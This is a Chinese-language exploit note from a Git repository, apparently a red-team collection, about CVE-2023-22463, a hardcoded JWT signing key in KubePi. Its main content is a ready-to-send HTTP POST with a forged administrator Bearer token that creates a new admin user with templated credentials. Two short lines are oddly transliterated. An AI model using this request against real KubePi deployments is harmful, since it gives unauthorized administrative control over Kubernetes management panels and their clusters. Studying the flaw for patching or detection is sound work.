admin/2023Hvv
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
2023Hvv/KubePi JwtSigKey 登陆绕过漏洞(CVE-2023-22463).md
ibaiw 55a3531280 add
2023-08-15 14:36:32 +08:00

44 lines
1.3 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

**漏洞描述**
KubePi 中存在 JWT 硬编码,攻击者通过硬编码可以获取服务器后台管理权限,添加任意用户
**漏洞影响**
库贝派
**网络测绘**
“库贝皮”
**漏洞复现**
登陆页面
![image-20230815141909095](./KubePi JwtSigKey 登陆绕过漏洞CVE-2023-22463.assets/image-20230815141909095.png)
```
POST /kubepi/api/v1/users HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.127 Safari/537.36
accept: application/json
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfX0.XxQmyfq_7jyeYvrjqsOZ4BB4GoSkfLO2NvbKCEQjld8
{
"authenticate": {
"password": "{{randstr}}"
},
"email": "{{randstr}}@qq.com",
"isAdmin": true,
"mfa": {
"enable": false
},
"name": "{{randstr}}",
"nickName": "{{randstr}}",
"roles": [
"Supper User"
]
}
```
![image-20230815141922835](./KubePi JwtSigKey 登陆绕过漏洞CVE-2023-22463.assets/image-20230815141922835.png)
Reference in New Issue View Git Blame Copy Permalink